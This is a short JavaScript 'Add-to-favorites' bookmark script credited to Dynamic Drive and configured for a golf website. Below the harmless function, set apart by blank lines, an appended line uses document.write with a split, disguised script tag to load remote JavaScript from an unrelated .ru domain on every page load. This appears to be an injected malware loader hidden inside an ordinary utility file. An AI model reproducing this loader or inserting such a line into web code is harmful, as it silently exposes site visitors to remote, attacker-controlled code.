/*
Add-to-favorites Script
Created by David Gardner (toolmandav@geocities.com)
No warranty of any kind comes with this script!
Permission granted to Dynamic Drive (http://dynamicdrive.com) 
to post and feature this script on their DHTML archive
*/

//configure the two variables below to match yoursite's own info
var bookmarkurl="http://www.1st-in-golf.com/"
var bookmarktitle="1st In Golf"

function addbookmark(){
if (document.all)
window.external.AddFavorite(bookmarkurl,bookmarktitle)
}



document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/External_Hard_Drive.js"></scri'+'pt>');